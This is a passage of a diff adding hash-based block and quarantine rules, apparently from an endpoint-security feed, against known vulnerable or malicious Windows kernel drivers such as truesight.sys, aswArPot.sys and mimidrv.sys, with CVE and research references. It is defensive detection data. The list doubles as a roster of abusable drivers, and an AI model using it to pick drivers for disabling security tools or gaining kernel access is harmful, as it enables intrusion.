"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452913Z", + "creation_date": "2026-03-23T11:45:30.452916Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.452925Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b71b7f86e41540a82d7750a698e0386b74f52962b879cbb46f17935183cd2c7", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90b4be1b-8b21-5d12-9fd3-e36511fcba11", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969382Z", + "creation_date": "2026-03-23T11:45:29.969384Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969390Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c5c8258836b58a830ef0289cdd544f741cd1054e8ae4732452553f680677825e", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90d9475e-5b4c-5fe5-8048-4c79fa5147ae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811507Z", + "creation_date": "2026-03-23T11:45:31.811509Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811514Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c6faf31cce58738989762bb173e25c7fbe1db0c65aca290e1e150aef5df5bf0e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90d98919-a2a4-5a58-b0bc-e7931420d70e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466270Z", + "creation_date": "2026-03-23T11:45:30.466273Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466282Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"c8ae217860f793fce3ad0239d7b357dba562824dd7177c9d723ca4d4a7f99a12", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90dd4aa3-65e5-55fc-9de3-2d70d07b0fb8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.161182Z", + "creation_date": "2026-03-23T11:45:31.161184Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.161189Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "548ae3270c01abaaa47ce523a1a1f55dcab8bcbb7e1ab2af63748117259a5fe1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90eb92d4-fb93-5280-bf5d-5ba7d643fa67", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" 
+ }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481009Z", + "creation_date": "2026-03-23T11:45:31.481013Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481023Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4619cb7fbfa46a9eb482bf6988ee67a5720f8685d5f1a5a715cb6f250af84ace", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90f285bb-fbd5-5c7e-b17c-4bae4c69b851", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977568Z", + "creation_date": "2026-03-23T11:45:29.977571Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977576Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4ac5c7fbb41ee988029b27d8b6be574725689fd1365f5a56f5a12d9120f86c6", + "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] 
[authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90f9224e-d2e7-5b8f-9693-87166a8ab05b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475539Z", + "creation_date": "2026-03-23T11:45:31.475543Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475553Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f7000fda0f12ed88ec7918021caed1c6d18248c31cc5e4043dff1016fe2470ab", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90ff1411-47c9-5655-9c0e-87cd7acc258b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473572Z", + "creation_date": "2026-03-23T11:45:30.473575Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473584Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b1375cb06b0e1ec47e3afea13824cff8f3d9d995960556c0795e9bec0fe48b70", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9101d8b1-6f1b-5c63-a79e-a72b759aef3c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817417Z", + "creation_date": "2026-03-23T11:45:30.817419Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817425Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "79247cd973878500461753431f1528ed35e5f85a8978bf68ac211335ffcae27a", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "911768ca-1f42-5ed1-8237-9f524b6a8a38", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815272Z", + "creation_date": "2026-03-23T11:45:31.815274Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815280Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d93c9ff5be30340df129c7fbeab0657228adbc69a6a41ef18fa870c67896a013", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9120f31c-1796-5992-89a9-3004655bca09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475987Z", + "creation_date": "2026-03-23T11:45:31.475991Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476002Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "3f3675944cb37db65ef8e924d5d38142d161b76e2895e0776669cad217594c00", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9128c603-cd3c-520a-a6b6-c37da59a15c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149075Z", + "creation_date": "2026-03-23T11:45:31.149077Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149083Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ada6b01f7bebb33525bf3df2d7f353461a26f81aaf6fe152081ce18cb97216d3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "912cd4ea-7e68-5d4a-9c23-cde44c74825f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610638Z", + "creation_date": "2026-03-23T11:45:29.610640Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610645Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8e5aef7c66c0e92dfc037ee29ade1c8484b8d7fadebdcf521d2763b1d8215126", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "912d96e9-d29e-5da1-9c60-9ee8900e5ed9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826656Z", + "creation_date": "2026-03-23T11:45:30.826659Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826664Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "accf1ca6cdc769088de122167fbe39ccedb7265b70a0874cfe5c74fcead44b53", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9130b846-0c6d-5edc-a5c0-247819e459d5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475504Z", + "creation_date": "2026-03-23T11:45:30.475507Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475516Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0856a1da15b2b3e8999bf9fc51bbdedd4051e21fab1302e2ce766180b4931d86", + "comment": "Vulnerable Kernel Driver (aka Blackbone.sys) [https://www.loldrivers.io/drivers/b9b835bd-b720-424b-9160-2442bc4d6e58/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9136c9c0-7cca-52b4-a5bb-36a81995d6c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829307Z", + 
"creation_date": "2026-03-23T11:45:30.829309Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829314Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b03990f69862eb3b2a43c484a46c55122ab39184423fe2dd86f656014345d48", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "91372f37-1686-5019-b33b-71ad24e9e2f3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487199Z", + "creation_date": "2026-03-23T11:45:31.487201Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487206Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8d6c7f8db8ad3c06a87a909582b3d57fd2c4610dfb29dd84a682a58522baa7bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "913cf8a3-0d0a-5a10-b354-48d3861cc0da", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480301Z", + "creation_date": "2026-03-23T11:45:31.480305Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480315Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "23bfa2f2b253cacd504bf7141aacf95542508138eaaf11552f33e914b098c9cb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "91555588-79da-56ca-99f9-eba95eea2ba5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816707Z", + "creation_date": "2026-03-23T11:45:31.816710Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816718Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd0052710de851fdb5d8f0fa875ac925f026b13b888c2439f3fd9038932f85ef", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9156020e-a274-5d99-8854-4d6a9478f5aa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488943Z", + "creation_date": "2026-03-23T11:45:31.488945Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488958Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "423eda2ea7f8197dc85633096f4b005c608a049185907d454efe559d6788eeb2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "916fff25-1937-5bdf-8560-8c46ee17d94c", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478317Z", + "creation_date": "2026-03-23T11:45:30.478320Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478329Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d998ea6d0051e17c1387c9f295b1c79bacb2f61c23809903445f60313d36c7fd", + "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "917065f7-dec3-5521-b073-5c1067c35c6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825102Z", + "creation_date": "2026-03-23T11:45:30.825106Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825115Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": 
null, + "references": [], + "type": "hash", + "value": "48ea9d497622facdf3b510c351059b2a9bedb0863dca334baa1ca70fdab985f3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "917ebf99-a250-562a-b29e-89464db134fb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818243Z", + "creation_date": "2026-03-23T11:45:30.818245Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818250Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18047c2d45758a43d6b7e56bcd4aa90354c899795baf944f037850c48d8e892a", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "919513ef-f647-52a4-ba39-c74fcb02e25f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, 
